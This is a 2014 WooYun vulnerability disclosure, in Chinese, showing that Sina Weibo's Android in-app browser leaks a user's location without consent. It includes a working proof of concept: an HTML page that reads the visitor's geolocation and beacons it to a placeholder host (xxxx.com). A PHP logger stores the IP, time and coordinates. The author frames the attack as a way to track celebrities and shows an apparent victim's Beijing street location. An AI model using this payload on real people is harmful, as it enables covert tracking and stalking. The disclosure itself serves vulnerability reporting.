当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-068337

漏洞标题:我是如何通过微博悄无声息的定位到某某明星位置信息

相关厂商:新浪微博

漏洞作者: mango

提交时间:2014-07-13 12:13

修复时间:2014-08-27 12:14

公开时间:2014-08-27 12:14

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-13: 细节已通知厂商并且等待厂商处理中
2014-07-13: 厂商已经确认,细节仅向厂商公开
2014-07-23: 细节向核心白帽子及相关领域专家公开
2014-08-02: 细节向普通白帽子公开
2014-08-12: 细节向实习白帽子公开
2014-08-27: 细节向公众公开

简要描述:

给大家意淫一下下~~~哈哈哈~狗仔队喜欢这个题目~
小漏洞大利用~~~~~~~~

详细说明:

1.这个漏洞是因为新浪微博内置的浏览器在用户不知道的情况下获取地理位置~
我们就利用这个漏洞来获取新浪微博那些明星地理位置~
2.利用方法:受害者发送含有下面POC的网页链接 当受害者通过安卓版新浪微博内置浏览器打开该页面时可悄然无息的获取受害者的经纬度。
POC :
建立 1.html

<!DOCTYPE html>
<html>
<body>
<script>
getLocation();
var x=document.getElementById("demo");
function getLocation()
  {
  if (navigator.geolocation)
    {
    navigator.geolocation.getCurrentPosition(showPosition);
    }
  else{x.innerHTML="Geolocation is not supported by this browser.";}
  }
function showPosition(position)
  {
img=new Image();img.src="http://xxxx.com/1.php?get="+position.coords.latitude+","+position.coords.longitude;
  }
</script>
</body>
</html>


建立 1.php

<?php
file_put_contents("test.txt",  " IP:".$_SERVER["REMOTE_ADDR"], FILE_APPEND); 
file_put_contents("test.txt",  " Time:".date("Y.m.d H:i:s"),FILE_APPEND); 
file_put_contents("test.txt",  " geo:".$_GET["get"]."\r\n",FILE_APPEND); 
?>

漏洞证明:

当受害者成功点进去我们的POC 网页~ 经纬度就神不知鬼不觉的到我们手里了~

CQ37D]YEKV0J_KFV14DB6[G.jpg


6HP%`)WH55E$}%P~I}DI9(T.jpg


525A10379868CFB0CDE8B87006530B35.jpg


东坝路
北京市朝阳区 ‎ 西北 145 米
不知道是哪位明星~

修复方案:

版权声明:转载请注明来源 mango@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2014-07-13 19:13

厂商回复:

非常感谢您的报告。该问题已经通过SSRC[http:///]平台获得,感谢对新浪安全工作的支持。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-07-13 12:26 | zph ( 普通白帽子 | Rank:235 漏洞数:43 )

    So Diao

  2. 2014-07-13 12:30 | 阿萨帝 ( 实习白帽子 | Rank:91 漏洞数:68 | 不发礼物的索要联系方式都是耍流氓。)

    高大上

  3. 2014-07-13 12:44 | 安然意境 ( 普通白帽子 | Rank:189 漏洞数:79 | 无论是你的事业还是你的个人,可能走的过程...)

    小漏洞大利用..

  4. 2014-07-13 19:20 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    what? - - 被人提交、、、

  5. 2014-07-13 19:41 | 低调的瘦子 ( 普通白帽子 | Rank:466 漏洞数:68 | loading……………………)

    @mango 好讨厌遇到你挖的洞,提交了,然后厂商说已通过SRC什么的获得该漏洞信息。。。他妹的

  6. 2014-07-13 19:59 | zcy ( 实习白帽子 | Rank:93 漏洞数:15 )

    此漏洞只影响屌丝,基友,皂友,不影响高富帅,故忽略

  7. 2014-07-13 20:00 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    @低调的瘦子 - - 其实没说“此漏洞只影响屌丝,基友,皂友,不影响高富帅,故忽略”就不错了

  8. 2014-07-13 21:26 | F4K3R ( 普通白帽子 | Rank:297 漏洞数:31 | 学习)

    图片。。。